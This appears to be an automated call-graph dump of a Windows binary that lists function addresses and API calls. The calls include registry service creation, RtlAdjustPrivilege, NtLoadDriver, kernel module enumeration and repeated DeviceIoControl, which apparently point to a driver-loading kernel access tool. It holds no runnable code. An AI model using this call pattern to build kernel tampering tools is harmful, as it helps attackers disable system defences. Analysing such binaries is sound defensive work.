5656->5659 5657->5650 5658->5647 5660 7ff7cc419c3d 5659->5660 5661 7ff7cc423fe0 free 5659->5661 5660->5211 5661->5660 5663 7ff7cc419af0 22 API calls 5662->5663 5664 7ff7cc413d1d 5663->5664 5665 7ff7cc413d3c GetFileAttributesExA 5664->5665 5668 7ff7cc413e27 5664->5668 5666 7ff7cc413d88 CreateFileA 5665->5666 5665->5668 5667 7ff7cc413dd3 GetCurrentProcessId OpenProcess 5666->5667 5666->5668 5671 7ff7cc413e1e CloseHandle 5667->5671 5672 7ff7cc413df1 SymInitialize 5667->5672 5669 7ff7cc413efe 5668->5669 5673 7ff7cc413ef9 5668->5673 5678 7ff7cc413e88 _invalid_parameter_noinfo_noreturn 5668->5678 5670 7ff7cc423fc0 8 API calls 5669->5670 5675 7ff7cc413f11 5670->5675 5671->5668 5676 7ff7cc413e8f SymSetOptions SymLoadModuleEx 5672->5676 5677 7ff7cc413e15 CloseHandle 5672->5677 5674 7ff7cc423fe0 free 5673->5674 5674->5669 5675->5214 5675->5234 5676->5668 5679 7ff7cc413ed8 SymCleanup 5676->5679 5677->5671 5678->5676 5679->5677 6139 7ff7cc419fb0 5680->6139 5683 7ff7cc418a99 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5684 7ff7cc414aa8 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J ??7ios_base@std@ 5683->5684 5684->5261 5684->5262 5686 7ff7cc419f65 5685->5686 5688 7ff7cc419f07 5685->5688 5687 7ff7cc419f67 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5686->5687 5687->5267 6169 7ff7cc419e00 5688->6169 5690 7ff7cc419f41 fclose 5690->5687 5692 7ff7cc414056 5691->5692 5693 7ff7cc414093 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5692->5693 5694 7ff7cc419ef0 12 API calls 5692->5694 5694->5693 5696 7ff7cc422937 5695->5696 5697 7ff7cc422dac 5696->5697 6181 7ff7cc41d270 5696->6181 6195 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5697->6195 5700 7ff7cc422987 5701 7ff7cc422db2 5700->5701 5703 7ff7cc41d270 6 API calls 5700->5703 6196 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5701->6196 5705 7ff7cc4229c9 RegCreateKeyW 5703->5705 5706 7ff7cc4229f6 RegSetKeyValueW 5705->5706 5714 7ff7cc4229ed 5705->5714 5707 7ff7cc422aa8 RegSetKeyValueW 5706->5707 5708 7ff7cc422a33 RegCloseKey 5706->5708 5709 7ff7cc422ad9 RegCloseKey 5707->5709 5710 7ff7cc422aeb RegCloseKey GetModuleHandleA 5707->5710 5708->5714 5709->5714 5712 7ff7cc422b0a GetProcAddress GetProcAddress RtlAdjustPrivilege 5710->5712 5735 7ff7cc422a5c 5710->5735 5711 7ff7cc41a7c0 29 API calls 5713 7ff7cc422a4c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5711->5713 5712->5714 5713->5735 5714->5711 5715 7ff7cc422da7 5714->5715 5718 7ff7cc41d270 6 API calls 5714->5718 6194 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5715->6194 5716 7ff7cc422cd6 5717 7ff7cc422d2b 5716->5717 5722 7ff7cc422d26 5716->5722 5726 7ff7cc422d1f _invalid_parameter_noinfo_noreturn 5716->5726 5723 7ff7cc422d80 5717->5723 5728 7ff7cc422d7b 5717->5728 5731 7ff7cc422d74 _invalid_parameter_noinfo_noreturn 5717->5731 5724 7ff7cc422b91 RtlInitUnicodeString NtLoadDriver 5718->5724 5720 7ff7cc422cd1 5725 7ff7cc423fe0 free 5720->5725 5721 7ff7cc422aa1 _invalid_parameter_noinfo_noreturn 5721->5707 5727 7ff7cc423fe0 free 5722->5727 5730 7ff7cc423fc0 8 API calls 5723->5730 5729 7ff7cc41a7c0 29 API calls 5724->5729 5725->5716 5726->5722 5727->5717 5732 7ff7cc423fe0 free 5728->5732 5733 7ff7cc422bc5 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5729->5733 5734 7ff7cc414b65 5730->5734 5731->5728 5732->5723 5733->5735 5734->5280 5734->5281 5735->5716 5735->5720 5735->5721 5736 7ff7cc41a7c0 29 API calls 5735->5736 5741 7ff7cc422ca2 _invalid_parameter_noinfo_noreturn 5735->5741 5742 7ff7cc423fe0 free 5735->5742 5737 7ff7cc422c0f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5736->5737 5738 7ff7cc41a7c0 29 API calls 5737->5738 5739 7ff7cc422c32 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5738->5739 5740 7ff7cc41a7c0 29 API calls 5739->5740 5743 7ff7cc422c55 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5740->5743 5741->5735 5742->5735 5743->5735 5745 7ff7cc42334e 5744->5745 5746 7ff7cc423300 5744->5746 5749 7ff7cc423352 5745->5749 5758 7ff7cc42336f 5745->5758 5747 7ff7cc423316 VirtualAlloc NtQuerySystemInformation 5746->5747 5748 7ff7cc423305 VirtualFree 5746->5748 5747->5745 5747->5746 5748->5747 5750 7ff7cc423357 VirtualFree 5749->5750 5751 7ff7cc423374 5749->5751 5750->5751 5753 7ff7cc423fc0 8 API calls 5751->5753 5752 7ff7cc423452 VirtualFree 5752->5751 5754 7ff7cc414c1e 5753->5754 5754->5292 5754->5294 5754->5297 5755 7ff7cc41c9f0 7 API calls 5755->5758 5756 7ff7cc4233f0 _stricmp 5757 7ff7cc423488 VirtualFree 5756->5757 5756->5758 5757->5751 5759 7ff7cc4234a8 5757->5759 5758->5751 5758->5752 5758->5755 5758->5756 5762 7ff7cc4234d1 _invalid_parameter_noinfo_noreturn 5758->5762 5763 7ff7cc423fe0 free 5758->5763 5760 7ff7cc4234d8 5759->5760 5759->5762 5761 7ff7cc423fe0 free 5760->5761 5761->5751 5762->5760 5763->5758 5769 7ff7cc41a7f0 ?good@ios_base@std@ 5764->5769 5766 7ff7cc41a871 5768 7ff7cc41a885 ?getloc@ios_base@std@@QEBA?AVlocale@2 5766->5768 5776 7ff7cc41a87b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5766->5776 5767 7ff7cc41a843 5767->5766 5772 7ff7cc41a859 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5767->5772 6197 7ff7cc41caf0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5768->6197 5769->5766 5769->5767 5772->5766 5773 7ff7cc41a9f7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5774 7ff7cc41aa01 5773->5774 5774->5309 5775 7ff7cc41a912 5775->5776 5778 7ff7cc41a980 5775->5778 5779 7ff7cc41a930 ?widen@?$ctype@_W@std@@QEBA_WD ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5775->5779 5776->5773 5776->5774 5777 7ff7cc41a8a3 5777->5775 5780 7ff7cc41a8f5 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5777->5780 5778->5776 5781 7ff7cc41a985 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5778->5781 5779->5775 5780->5775 5780->5777 5781->5776 5781->5778 5783 7ff7cc417b5a 5782->5783 5784 7ff7cc417b30 5782->5784 5783->5784 5785 7ff7cc417b6c 5783->5785 5786 7ff7cc41a3c0 9 API calls 5784->5786 5787 7ff7cc417b74 memset 5785->5787 5788 7ff7cc417b43 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5786->5788 6211 7ff7cc415e00 5787->6211 5796 7ff7cc417c37 5788->5796 5791 7ff7cc423fc0 8 API calls 5792 7ff7cc417c47 5791->5792 5792->5311 5793 7ff7cc41a3c0 9 API calls 5794 7ff7cc417c1e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5793->5794 5797 7ff7cc417c2f 5794->5797 5795 7ff7cc423fe0 free 5795->5796 5796->5791 5797->5795 6217 7ff7cc417c70 5798->6217 5801 7ff7cc417b00 22 API calls 5802 7ff7cc41731f 5801->5802 5803 7ff7cc417c70 21 API calls 5802->5803 5804 7ff7cc417341 5803->5804 5805 7ff7cc417b00 22 API calls 5804->5805 5806 7ff7cc417360 5805->5806 5807 7ff7cc41741a 5806->5807 5808 7ff7cc417c70 21 API calls 5806->5808 5809 7ff7cc41743a 5807->5809 5810 7ff7cc4173c7 5807->5810 5811 7ff7cc417395 5808->5811 5812 7ff7cc41a7c0 29 API calls 5809->5812 5816 7ff7cc41a3c0 9 API calls 5810->5816 5813 7ff7cc417b00 22 API calls 5811->5813 5814 7ff7cc417446 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5812->5814 5815 7ff7cc4173b4 5813->5815 5817 7ff7cc41a7c0 29 API calls 5814->5817 5815->5810 5821 7ff7cc41a3c0 9 API calls 5815->5821 5818 7ff7cc4173d3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5816->5818 5819 7ff7cc417489 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5817->5819 5820 7ff7cc417acd 5818->5820 6231 7ff7cc416d90 5819->6231 5824 7ff7cc423fc0 8 API calls 5820->5824 5822 7ff7cc4173f6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5821->5822 5822->5807 5826 7ff7cc414df4 5824->5826 5826->5293 5882 7ff7cc417ea0 5826->5882 5827 7ff7cc416d90 9 API calls 5828 7ff7cc4174e8 5827->5828 6237 7ff7cc416e90 5828->6237 5831 7ff7cc41a3c0 9 API calls 5832 7ff7cc417516 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5831->5832 5833 7ff7cc41752f 5832->5833 6257 7ff7cc4170e0 5833->6257 5835 7ff7cc41754e 5837 7ff7cc41a3c0 9 API calls 5835->5837 5836 7ff7cc417570 DeviceIoControl 5836->5835 5838 7ff7cc417546 5836->5838 5839 7ff7cc417a70 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5837->5839 5838->5835 5838->5836 5840 7ff7cc4175e8 5838->5840 5841 7ff7cc416fc0 50 API calls 5839->5841 5842 7ff7cc417600 DeviceIoControl 5840->5842 5843 7ff7cc417678 5840->5843 5847 7ff7cc417a88 5841->5847 5842->5835 5842->5840 5844 7ff7cc41a7c0 29 API calls 5843->5844 5845 7ff7cc41768b ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5844->5845 5848 7ff7cc4176d0 DeviceIoControl 5845->5848 5846 7ff7cc417ac8 5850 7ff7cc423fe0 free 5846->5850 5847->5820 5847->5846 5849 7ff7cc417ac1 _invalid_parameter_noinfo_noreturn 5847->5849 5848->5835 5851 7ff7cc417731 5848->5851 5849->5846 5850->5820 5851->5848 5852 7ff7cc417740 5851->5852 5853 7ff7cc417760 DeviceIoControl 5852->5853 5854 7ff7cc4177d0 5852->5854 5853->5835 5853->5852 5854->5835 5855 7ff7cc4178aa 5854->5855 6279 7ff7cc424090 AcquireSRWLockExclusive 5854->6279 5856 7ff7cc4178e3 5855->5856 5857 7ff7cc4178b4 5855->5857 6284 7ff7cc41c360 5856->6284 5859 7ff7cc41a3c0 9 API calls 5857->5859 5862 7ff7cc4178c7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5859->5862 5862->5835 5863 7ff7cc4178f4 5863->5835 5865 7ff7cc4178fe 5863->5865 5867 7ff7cc417910 DeviceIoControl 5865->5867 5870 7ff7cc417987 5865->5870 5867->5865 5867->5870 5872 7ff7cc417a13 5870->5872 5874 7ff7cc4179a0 DeviceIoControl 5870->5874 6300 7ff7cc416fc0 5872->6300 5874->5870 5874->5872 5879 7ff7cc417a1b 5880 7ff7cc41a3c0 9 API calls 5879->5880 5881 7ff7cc417a2e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5880->5881 5881->5847 5883 7ff7cc41c9f0 7 API calls 5882->5883 5884 7ff7cc417ef9 5883->5884 5885 7ff7cc4232c0 25 API calls 5884->5885 5886 7ff7cc417f03 5885->5886 5887 7ff7cc417f44 5886->5887 5888 7ff7cc417f3f 5886->5888 5889 7ff7cc417f38 _invalid_parameter_noinfo_noreturn 5886->5889 5891 7ff7cc417c70 21 API calls 5887->5891 5909 7ff7cc417f49 5887->5909 5890 7ff7cc423fe0 free 5888->5890 5889->5888 5890->5887 5892 7ff7cc417f6c 5891->5892 5893 7ff7cc417b00 22 API calls 5892->5893 5895 7ff7cc417f8b 5893->5895 5894 7ff7cc41a3c0 9 API calls 5896 7ff7cc418966 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5894->5896 5897 7ff7cc417b00 22 API calls 5895->5897 5895->5909 5924 7ff7cc418183 5896->5924 5898 7ff7cc417fc1 5897->5898 5901 7ff7cc416d90 9 API calls 5898->5901 5898->5909 5899 7ff7cc423fc0 8 API calls 5900 7ff7cc414e09 5899->5900 5900->5293 5987 7ff7cc416810 NtQuerySystemInformation 5900->5987 5902 7ff7cc417fe7 5901->5902 5903 7ff7cc416d90 9 API calls 5902->5903 5904 7ff7cc418001 5903->5904 5905 7ff7cc41a3c0 9 API calls 5904->5905 5904->5909 5906 7ff7cc41802e ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5905->5906 5907 7ff7cc416e90 50 API calls 5906->5907 5908 7ff7cc418062 5907->5908 5908->5909 5910 7ff7cc41a3c0 9 API calls 5908->5910 5909->5894 5909->5924 5911 7ff7cc418085 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5910->5911 5912 7ff7cc4180b0 DeviceIoControl 5911->5912 5913 7ff7cc418119 5912->5913 5914 7ff7cc41891b 5912->5914 5913->5912 5915 7ff7cc418128 5913->5915 5916 7ff7cc41a3c0 9 API calls 5914->5916 5917 7ff7cc418131 5915->5917 5963 7ff7cc41818a 5915->5963 5918 7ff7cc41892e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5916->5918 5919 7ff7cc41a3c0 9 API calls 5917->5919 5920 7ff7cc416fc0 50 API calls 5918->5920 5921 7ff7cc418144 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5919->5921 5920->5909 5922 7ff7cc416fc0 50 API calls 5921->5922 5923 7ff7cc41815c 5922->5923 5923->5924 5926 7ff7cc41a3c0 9 API calls 5923->5926 5924->5899 5925 7ff7cc4181e2 DeviceIoControl 5927 7ff7cc418827 5925->5927 5925->5963 5928 7ff7cc418173 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5926->5928 5929 7ff7cc41a3c0 9 API calls 5927->5929 5928->5924 5930 7ff7cc41884c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5929->5930 5932 7ff7cc41855f 5930->5932 5931 7ff7cc418290 DeviceIoControl 5931->5927 5931->5963 5933 7ff7cc416fc0 50 API calls 5932->5933 5935 7ff7cc418866 5933->5935 5934 7ff7cc4184e0 DeviceIoControl 5934->5927 5934->5963 5936 7ff7cc41a3c0 9 API calls 5935->5936 5941 7ff7cc418825 5935->5941 5937 7ff7cc41887d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5936->5937 5937->5941 5938 7ff7cc4188d2 5938->5924 5945 7ff7cc418911 5938->5945 5946 7ff7cc41890a _invalid_parameter_noinfo_noreturn 5938->5946 5939 7ff7cc418339 memset 5942 7ff7cc415e00 9 API calls 5939->5942 5940 7ff7cc4188cd 5944 7ff7cc423fe0 free 5940->5944 5941->5938 5941->5940 5943 7ff7cc4188c6 _invalid_parameter_noinfo_noreturn 5941->5943 5942->5963 5943->5940 5944->5938 5947 7ff7cc423fe0 free 5945->5947 5946->5945 5947->5924 5948 7ff7cc41c8b0 7 API calls 5948->5963 5949 7ff7cc41a3c0 9 API calls 5950 7ff7cc4187da ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5949->5950 5951 7ff7cc4187ef 5950->5951 5952 7ff7cc416fc0 50 API calls 5951->5952 5953 7ff7cc4187f4 5952->5953 5955 7ff7cc4187b1 5953->5955 5956 7ff7cc41a3c0 9 API calls 5953->5956 5954 7ff7cc41856b 5957 7ff7cc41a3c0 9 API calls 5954->5957 5961 7ff7cc423fe0 free 5955->5961 5960 7ff7cc41880b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5956->5960 5962 7ff7cc41857e 5957->5962 5958 7ff7cc418564 _invalid_parameter_noinfo_noreturn 5958->5954 5959 7ff7cc423fe0 free 5959->5963 5960->5955 5961->5941 5964 7ff7cc41c8b0 7 API calls 5962->5964 5963->5925 5963->5927 5963->5931 5963->5932 5963->5934 5963->5939 5963->5948 5963->5954 5963->5958 5963->5959 5980 7ff7cc418753 5963->5980 5965 7ff7cc4185b6 5964->5965 5966 7ff7cc41d590 9 API calls 5965->5966 5967 7ff7cc4185d1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5966->5967 5968 7ff7cc4185ec 5967->5968 5969 7ff7cc418625 5967->5969 5971 7ff7cc418620 5968->5971 5973 7ff7cc418619 _invalid_parameter_noinfo_noreturn 5968->5973 5970 7ff7cc418640 DeviceIoControl 5969->5970 5974 7ff7cc4186b8 5969->5974 5970->5969 5970->5980 5972 7ff7cc423fe0 free 5971->5972 5972->5969 5973->5971 5975 7ff7cc4186d0 DeviceIoControl 5974->5975 5976 7ff7cc418740 5974->5976 5975->5974 5975->5980 6400 7ff7cc416320 5976->6400 5978 7ff7cc418748 5979 7ff7cc41875c 5978->5979 5978->5980 5981 7ff7cc41a3c0 9 API calls 5979->5981 5980->5949 5982 7ff7cc418768 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5981->5982 5983 7ff7cc416fc0 50 API calls 5982->5983 5984 7ff7cc418785 5983->5984 5984->5955 5985 7ff7cc41a3c0 9 API calls 5984->5985 5986 7ff7cc41879c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5985->5986 5986->5951 5988 7ff7cc41686b 5987->5988 5993 7ff7cc4168b6 5987->5993 5989 7ff7cc416870 VirtualFree VirtualAlloc NtQuerySystemInformation 5988->5989 5989->5989 5989->5993 5990 7ff7cc416927 5991 7ff7cc416d48 VirtualFree 5990->5991 6023 7ff7cc416cfe 5990->6023 5991->6023 5992 7ff7cc416931 VirtualFree 5995 7ff7cc41694b 5992->5995 5992->6023 5993->5990 5993->5992 5994 7ff7cc4168e0 GetCurrentProcessId 5993->5994 5999 7ff7cc41692c 5993->5999 5993->6023 5994->5993 5997 7ff7cc416960 DeviceIoControl 5995->5997 6004 7ff7cc4169d8 5995->6004 5996 7ff7cc423fc0 8 API calls 5998 7ff7cc414e22 5996->5998 5997->5995 6000 7ff7cc416d03 5997->6000 5998->5293 5998->5320 5999->5992 6001 7ff7cc41a3c0 9 API calls 6000->6001 6003 7ff7cc416d16 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6001->6003 6002 7ff7cc416a00 DeviceIoControl 6002->6000 6002->6004 6003->6023 6004->6000 6004->6002 6006 7ff7cc416a78 6004->6006 6005 7ff7cc416aa0 DeviceIoControl 6005->6000 6005->6006 6006->6000 6006->6005 6008 7ff7cc416b18 6006->6008 6007 7ff7cc416b40 DeviceIoControl 6007->6000 6007->6008 6008->6000 6008->6007 6009 7ff7cc416bb8 6008->6009 6009->6000 6010 7ff7cc416bc5 6009->6010 6011 7ff7cc416bed memset 6010->6011 6012 7ff7cc415e00 9 API calls 6011->6012 6015 7ff7cc416c10 6012->6015 6013 7ff7cc416c14 6016 7ff7cc41a3c0 9 API calls 6013->6016 6014 7ff7cc416c30 DeviceIoControl 6014->6013 6014->6015 6015->6013 6015->6014 6017 7ff7cc416c9c 6015->6017 6018 7ff7cc416ce4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6016->6018 6019 7ff7cc41a3c0 9 API calls 6017->6019 6020 7ff7cc416cf6 6018->6020 6022 7ff7cc416caf 6019->6022 6021 7ff7cc423fe0 free 6020->6021 6021->6023 6024 7ff7cc41a3c0 9 API calls 6022->6024 6023->5996 6025 7ff7cc416cbd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6024->6025 6025->6020 6027 7ff7cc41c9f0 7 API calls 6026->6027 6028 7ff7cc415073 6027->6028 6029 7ff7cc4232c0 25 API calls 6028->6029 6030 7ff7cc41507d 6029->6030 6031 7ff7cc4150be 6030->6031 6032 7ff7cc4150b9 6030->6032 6035 7ff7cc4150b2 _invalid_parameter_noinfo_noreturn 6030->6035 6033 7ff7cc4150ea 6031->6033 6034 7ff7cc4150c3 6031->6034 6036 7ff7cc423fe0 free 6032->6036 6038 7ff7cc417c70 21 API calls 6033->6038 6037 7ff7cc41a7c0 29 API calls 6034->6037 6035->6032 6036->6031 6039 7ff7cc4150d6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6037->6039 6040 7ff7cc415101 6038->6040 6094 7ff7cc41514b 6039->6094 6041 7ff7cc417b00 22 API calls 6040->6041 6042 7ff7cc415120 6041->6042 6044 7ff7cc415128 6042->6044 6046 7ff7cc417c70 21 API calls 6042->6046 6043 7ff7cc423fc0 8 API calls 6045 7ff7cc414e34 6043->6045 6047 7ff7cc41a7c0 29 API calls 6044->6047 6045->5313 6045->5323 6048 7ff7cc415191 6046->6048 6049 7ff7cc41513b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6047->6049 6050 7ff7cc417b00 22 API calls 6048->6050 6049->6094 6051 7ff7cc4151b0 6050->6051 6051->6044 6052 7ff7cc4151c4 6051->6052 6053 7ff7cc417c70 21 API calls 6052->6053 6054 7ff7cc4151db 6053->6054 6055 7ff7cc417b00 22 API calls 6054->6055 6056 7ff7cc4151fa 6055->6056 6057 7ff7cc41526f 6056->6057 6059 7ff7cc417c70 21 API calls 6056->6059 6058 7ff7cc416d90 9 API calls 6057->6058 6060 7ff7cc415281 6058->6060 6061 7ff7cc415219 6059->6061 6062 7ff7cc416d90 9 API calls 6060->6062 6063 7ff7cc417b00 22 API calls 6061->6063 6064 7ff7cc415297 6062->6064 6065 7ff7cc415238 6063->6065 6066 7ff7cc4152b0 DeviceIoControl 6064->6066 6067 7ff7cc41531f 6064->6067 6068 7ff7cc41a7c0 29 API calls 6065->6068 6066->6064 6066->6067 6069 7ff7cc416d90 9 API calls 6067->6069 6070 7ff7cc41525f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6068->6070 6071 7ff7cc415332 6069->6071 6070->6057 6434 7ff7cc415990 6071->6434 6073 7ff7cc415370 DeviceIoControl 6078 7ff7cc41533e 6073->6078 6074 7ff7cc415990 9 API calls 6074->6078 6075 7ff7cc41540b memset 6076 7ff7cc415e00 9 API calls 6075->6076 6076->6078 6077 7ff7cc415449 wcsstr 6077->6078 6078->6073 6078->6074 6078->6075 6078->6077 6079 7ff7cc4154ba _invalid_parameter_noinfo_noreturn 6078->6079 6080 7ff7cc423fe0 free 6078->6080 6082 7ff7cc4154c1 6078->6082 6078->6094 6079->6082 6080->6078 6081 7ff7cc4154f0 DeviceIoControl 6081->6082 6082->6081 6083 7ff7cc4155b5 6082->6083 6084 7ff7cc415587 6082->6084 6085 7ff7cc4155e0 DeviceIoControl 6083->6085 6086 7ff7cc41564c 6083->6086 6087 7ff7cc41a7c0 29 API calls 6084->6087 6085->6083 6085->6086 6088 7ff7cc415990 9 API calls 6086->6088 6089 7ff7cc41559a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6087->6089 6090 7ff7cc415654 6088->6090 6091 7ff7cc415978 6089->6091 6093 7ff7cc415990 9 API calls 6090->6093 6092 7ff7cc423fe0 free 6091->6092 6092->6094 6095 7ff7cc415664 6093->6095 6094->6043 6096 7ff7cc415680 DeviceIoControl 6095->6096 6097 7ff7cc4156ed 6095->6097 6096->6095 6096->6097 6098 7ff7cc415700 DeviceIoControl 6097->6098 6099 7ff7cc41576c 6097->6099 6098->6097 6098->6099 6100 7ff7cc415780 DeviceIoControl 6099->6100 6101 7ff7cc4157f4 6099->6101 6100->6099 6100->6101 6102 7ff7cc415810 DeviceIoControl 6101->6102 6103 7ff7cc41587c 6101->6103 6102->6101 6102->6103 6104 7ff7cc415890 DeviceIoControl 6103->6104 6105 7ff7cc415904 6103->6105 6104->6103 6104->6105 6106 7ff7cc41590f 6105->6106 6107 7ff7cc415934 6105->6107 6108 7ff7cc41a7c0 29 API calls 6106->6108 6440 7ff7cc41aa30 6107->6440 6110 7ff7cc415922 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6108->6110 6111 7ff7cc415941 6110->6111 6112 7ff7cc41a7c0 29 API calls 6111->6112 6113 7ff7cc415954 6112->6113 6114 7ff7cc41a3c0 9 API calls 6113->6114 6115 7ff7cc415966 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6114->6115 6115->6091 6118 7ff7cc41cece 6117->6118 6119 7ff7cc41d022 6117->6119 6120 7ff7cc41cf2e 6118->6120 6123 7ff7cc41cf5a 6118->6123 6124 7ff7cc41cf21 6118->6124 6137 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 6119->6137 6125 7ff7cc424108 std::_Facet_Register 3 API calls 6120->6125 6122 7ff7cc41d027 6127 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 6122->6127 6126 7ff7cc41cf43 6123->6126 6129 7ff7cc424108 std::_Facet_Register 3 API calls 6123->6129 6124->6120 6124->6122 6125->6126 6128 7ff7cc41cfdb _invalid_parameter_noinfo_noreturn 6126->6128 6131 7ff7cc41cf8e memmove memmove 6126->6131 6132 7ff7cc41cfe2 memmove memmove 6126->6132 6130 7ff7cc41d02d 6127->6130 6128->6132 6129->6126 6130->5640 6133 7ff7cc41cfb9 6131->6133 6134 7ff7cc41cfce 6131->6134 6135 7ff7cc41cfd9 6132->6135 6133->6128 6133->6134 6136 7ff7cc423fe0 free 6134->6136 6135->5640 6136->6135 6140 7ff7cc419fde ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH 6139->6140 6141 7ff7cc41a09a 6139->6141 6140->6141 6142 7ff7cc419ffc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ _get_stream_buffer_pointers ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2 6140->6142 6143 7ff7cc423fc0 8 API calls 6141->6143 6148 7ff7cc41c7a0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 